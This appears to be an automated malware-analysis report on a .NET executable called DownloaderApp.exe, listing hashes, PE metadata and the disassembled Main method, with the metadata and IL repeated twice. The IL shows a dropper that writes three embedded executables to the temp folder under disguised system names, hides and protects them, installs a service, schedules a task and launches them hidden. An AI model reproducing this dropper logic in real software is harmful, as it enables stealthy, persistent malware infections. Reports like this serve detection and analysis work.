b714678848dd73c8d60a765e78c9effd
PE Executable | MD5: b714678848dd73c8d60a765e78c9effd | Size: 4.39 MB | application/x-dosexec
Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | b714678848dd73c8d60a765e78c9effd
|
| Sha1 | 7fac9e30d2ef525d8b6fd62fc7f1411d8c4160fb
|
| Sha256 | 81ddacc1d4689616b993f34465cb372e6046c035b45a4831343bd55ed37d48ee
|
| Sha384 | c3b961497948fe9f5e3aa58bd894e2f76bc0516ec6da8407f1ee44831073266d9daaad6f997cae334f0d4419bf2040f5
|
| Sha512 | 8b2c12f1bd2cd4cd4cc04eca47514694b00376450e7f9874c1facb4e4f90269fff669c83ac5ebe690fb4ae66023494f58653d3d4a17c97eddd4e3460ae4734e4
|
| SSDeep | 98304:KNNvLT3R4w3K6tZSaMSs1eJMn7w08BKAqffmj4W+:AN2w3E16MiBrUfmE
|
| TLSH | 5E1622117D56C032D56251B21F79EFF285BDBC21AB3149CB77C01E36AA211E2AA31F39
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: c:\10\boot\Downloader_shop\DownloaderApp\DownloaderApp\obj\Release\DownloaderApp.pdb |
| Module Name | DownloaderApp.exe |
| Full Name | DownloaderApp.exe |
| EntryPoint | System.Void DownloaderApp.Program::Main(System.String[]) |
| Scope Name | DownloaderApp.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | DownloaderApp |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.7.2 |
| Total Strings | 58 |
| Main Method | System.Void DownloaderApp.Program::Main(System.String[]) |
| Main IL Instruction Count | 255 |
| Main IL | call System.Boolean System.Environment::get_UserInteractive() brtrue.s IL_0012: ldc.i4.s 10 newobj System.Void DownloaderApp.ServiceHost::.ctor() call System.Void System.ServiceProcess.ServiceBase::Run(System.ServiceProcess.ServiceBase) ret <null> ldc.i4.s 10 newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr runtimehost.exe stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldstr systemhelper.exe stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr windowsruntime.exe stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldstr hostprovider.exe stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr servicehelper.exe stelem.ref <null> ldloc.s V_15 ldc.i4.5 <null> ldstr taskmanager.exe stelem.ref <null> ldloc.s V_15 ldc.i4.6 <null> ldstr systemruntime.exe stelem.ref <null> ldloc.s V_15 ldc.i4.7 <null> ldstr windowsservice.exe stelem.ref <null> ldloc.s V_15 ldc.i4.8 <null> ldstr hostmanager.exe stelem.ref <null> ldloc.s V_15 ldc.i4.s 9 ldstr runtimeprovider.exe stelem.ref <null> ldloc.s V_15 stloc.0 <null> ldc.i4.s 10 newarr System.String stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldstr WindowsSystemMaintenance stelem.ref <null> ldloc.s V_16 ldc.i4.1 <null> ldstr MicrosoftSystemMonitor stelem.ref <null> ldloc.s V_16 ldc.i4.2 <null> ldstr WindowsUpdateAssistant stelem.ref <null> ldloc.s V_16 ldc.i4.3 <null> ldstr SystemPerformanceMonitor stelem.ref <null> ldloc.s V_16 ldc.i4.4 <null> ldstr WindowsSecurityScanner stelem.ref <null> ldloc.s V_16 ldc.i4.5 <null> ldstr MicrosoftServiceHost stelem.ref <null> ldloc.s V_16 ldc.i4.6 <null> ldstr SystemConfigurationManager stelem.ref <null> ldloc.s V_16 ldc.i4.7 <null> ldstr WindowsDiagnosticTool stelem.ref <null> ldloc.s V_16 ldc.i4.8 <null> ldstr MicrosoftRuntimeService stelem.ref <null> ldloc.s V_16 ldc.i4.s 9 ldstr SystemHealthMonitor stelem.ref <null> ldloc.s V_16 stloc.1 <null> newobj System.Void System.Random::.ctor() stloc.2 <null> ldloc.0 <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor(System.Collections.Generic.IEnumerable`1<System.String>) stloc.3 <null> ldloc.3 <null> ldloc.2 <null> ldloc.3 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.String>::get_Count() callvirt System.Int32 System.Random::Next(System.Int32) callvirt System.String System.Collections.Generic.List`1<System.String>::get_Item(System.Int32) stloc.s V_4 ldloc.3 <null> ldloc.s V_4 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Remove(System.String) pop <null> ldloc.3 <null> ldloc.2 <null> ldloc.3 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.String>::get_Count() callvirt System.Int32 System.Random::Next(System.Int32) callvirt System.String System.Collections.Generic.List`1<System.String>::get_Item(System.Int32) stloc.s V_5 ldloc.3 <null> ldloc.s V_5 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Remove(System.String) pop <null> ldloc.3 <null> ldloc.2 <null> ldloc.3 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.String>::get_Count() callvirt System.Int32 System.Random::Next(System.Int32) callvirt System.String System.Collections.Generic.List`1<System.String>::get_Item(System.Int32) stloc.s V_6 ldloc.3 <null> ldloc.s V_6 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Remove(System.String) pop <null> ldloc.1 <null> ldloc.2 <null> ldloc.1 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> stloc.s V_7 call System.String System.IO.Path::GetTempPath() stloc.s V_8 ldloc.s V_8 ldloc.s V_4 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_9 ldloc.s V_8 ldloc.s V_5 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_10 ldloc.s V_8 ldloc.s V_6 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_11 ldstr DownloaderApp.EyGI1HEr.res ldloc.s V_9 call System.Void DownloaderApp.Program::ExtractEmbeddedExe(System.String,System.String) ldstr DownloaderApp.ZoDu9zzf.str ldloc.s V_10 call System.Void DownloaderApp.Program::ExtractEmbeddedExe(System.String,System.String) ldstr DownloaderApp.IkwkzyAH.her ldloc.s V_11 call System.Void DownloaderApp.Program::ExtractEmbeddedExe(System.String,System.String) ldloc.s V_9 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_10 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_11 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_9 call System.Void DownloaderApp.Program::SetNtfsProtection(System.String) ldloc.s V_10 call System.Void DownloaderApp.Program::SetNtfsProtection(System.String) ldloc.s V_11 call System.Void DownloaderApp.Program::SetNtfsProtection(System.String) call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() call System.Void DownloaderApp.Program::TryInstallService(System.String) ldloc.s V_9 ldloc.s V_7 call System.Void DownloaderApp.Program::CreateScheduledTask(System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_12 ldloc.s V_12 ldstr cmd.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_12 ldstr /c start "" "{0}" ldloc.s V_9 call System.String System.String::Format(System.String,System.Object) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_12 ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.s V_12 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.s V_12 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_12 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_13 ldloc.s V_13 ldstr cmd.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_13 ldstr /c start "" "{0}" ldloc.s V_10 call System.String System.String::Format(System.String,System.Object) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_13 ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.s V_13 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.s V_13 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_13 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_14 ldloc.s V_14 ldstr cmd.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_14 ldstr /c start "" "{0}" ldloc.s V_11 call System.String System.String::Format(System.String,System.Object) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_14 ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.s V_14 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.s V_14 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_14 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> leave.s IL_02B9: ret pop <null> leave.s IL_02B9: ret ret <null> |
| Module Name | DownloaderApp.exe |
| Full Name | DownloaderApp.exe |
| EntryPoint | System.Void DownloaderApp.Program::Main(System.String[]) |
| Scope Name | DownloaderApp.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | DownloaderApp |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.7.2 |
| Total Strings | 58 |
| Main Method | System.Void DownloaderApp.Program::Main(System.String[]) |
| Main IL Instruction Count | 255 |
| Main IL | call System.Boolean System.Environment::get_UserInteractive() brtrue.s IL_0012: ldc.i4.s 10 newobj System.Void DownloaderApp.ServiceHost::.ctor() call System.Void System.ServiceProcess.ServiceBase::Run(System.ServiceProcess.ServiceBase) ret <null> ldc.i4.s 10 newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr runtimehost.exe stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldstr systemhelper.exe stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr windowsruntime.exe stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldstr hostprovider.exe stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr servicehelper.exe stelem.ref <null> ldloc.s V_15 ldc.i4.5 <null> ldstr taskmanager.exe stelem.ref <null> ldloc.s V_15 ldc.i4.6 <null> ldstr systemruntime.exe stelem.ref <null> ldloc.s V_15 ldc.i4.7 <null> ldstr windowsservice.exe stelem.ref <null> ldloc.s V_15 ldc.i4.8 <null> ldstr hostmanager.exe stelem.ref <null> ldloc.s V_15 ldc.i4.s 9 ldstr runtimeprovider.exe stelem.ref <null> ldloc.s V_15 stloc.0 <null> ldc.i4.s 10 newarr System.String stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldstr WindowsSystemMaintenance stelem.ref <null> ldloc.s V_16 ldc.i4.1 <null> ldstr MicrosoftSystemMonitor stelem.ref <null> ldloc.s V_16 ldc.i4.2 <null> ldstr WindowsUpdateAssistant stelem.ref <null> ldloc.s V_16 ldc.i4.3 <null> ldstr SystemPerformanceMonitor stelem.ref <null> ldloc.s V_16 ldc.i4.4 <null> ldstr WindowsSecurityScanner stelem.ref <null> ldloc.s V_16 ldc.i4.5 <null> ldstr MicrosoftServiceHost stelem.ref <null> ldloc.s V_16 ldc.i4.6 <null> ldstr SystemConfigurationManager stelem.ref <null> ldloc.s V_16 ldc.i4.7 <null> ldstr WindowsDiagnosticTool stelem.ref <null> ldloc.s V_16 ldc.i4.8 <null> ldstr MicrosoftRuntimeService stelem.ref <null> ldloc.s V_16 ldc.i4.s 9 ldstr SystemHealthMonitor stelem.ref <null> ldloc.s V_16 stloc.1 <null> newobj System.Void System.Random::.ctor() stloc.2 <null> ldloc.0 <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor(System.Collections.Generic.IEnumerable`1<System.String>) stloc.3 <null> ldloc.3 <null> ldloc.2 <null> ldloc.3 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.String>::get_Count() callvirt System.Int32 System.Random::Next(System.Int32) callvirt System.String System.Collections.Generic.List`1<System.String>::get_Item(System.Int32) stloc.s V_4 ldloc.3 <null> ldloc.s V_4 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Remove(System.String) pop <null> ldloc.3 <null> ldloc.2 <null> ldloc.3 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.String>::get_Count() callvirt System.Int32 System.Random::Next(System.Int32) callvirt System.String System.Collections.Generic.List`1<System.String>::get_Item(System.Int32) stloc.s V_5 ldloc.3 <null> ldloc.s V_5 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Remove(System.String) pop <null> ldloc.3 <null> ldloc.2 <null> ldloc.3 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.String>::get_Count() callvirt System.Int32 System.Random::Next(System.Int32) callvirt System.String System.Collections.Generic.List`1<System.String>::get_Item(System.Int32) stloc.s V_6 ldloc.3 <null> ldloc.s V_6 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Remove(System.String) pop <null> ldloc.1 <null> ldloc.2 <null> ldloc.1 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> stloc.s V_7 call System.String System.IO.Path::GetTempPath() stloc.s V_8 ldloc.s V_8 ldloc.s V_4 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_9 ldloc.s V_8 ldloc.s V_5 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_10 ldloc.s V_8 ldloc.s V_6 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_11 ldstr DownloaderApp.EyGI1HEr.res ldloc.s V_9 call System.Void DownloaderApp.Program::ExtractEmbeddedExe(System.String,System.String) ldstr DownloaderApp.ZoDu9zzf.str ldloc.s V_10 call System.Void DownloaderApp.Program::ExtractEmbeddedExe(System.String,System.String) ldstr DownloaderApp.IkwkzyAH.her ldloc.s V_11 call System.Void DownloaderApp.Program::ExtractEmbeddedExe(System.String,System.String) ldloc.s V_9 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_10 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_11 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_9 call System.Void DownloaderApp.Program::SetNtfsProtection(System.String) ldloc.s V_10 call System.Void DownloaderApp.Program::SetNtfsProtection(System.String) ldloc.s V_11 call System.Void DownloaderApp.Program::SetNtfsProtection(System.String) call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() call System.Void DownloaderApp.Program::TryInstallService(System.String) ldloc.s V_9 ldloc.s V_7 call System.Void DownloaderApp.Program::CreateScheduledTask(System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_12 ldloc.s V_12 ldstr cmd.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_12 ldstr /c start "" "{0}" ldloc.s V_9 call System.String System.String::Format(System.String,System.Object) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_12 ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.s V_12 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.s V_12 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_12 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_13 ldloc.s V_13 ldstr cmd.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_13 ldstr /c start "" "{0}" ldloc.s V_10 call System.String System.String::Format(System.String,System.Object) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_13 ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.s V_13 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.s V_13 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_13 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_14 ldloc.s V_14 ldstr cmd.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_14 ldstr /c start "" "{0}" ldloc.s V_11 call System.String System.String::Format(System.String,System.Object) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_14 ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.s V_14 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.s V_14 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_14 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> leave.s IL_02B9: ret pop <null> leave.s IL_02B9: ret ret <null> |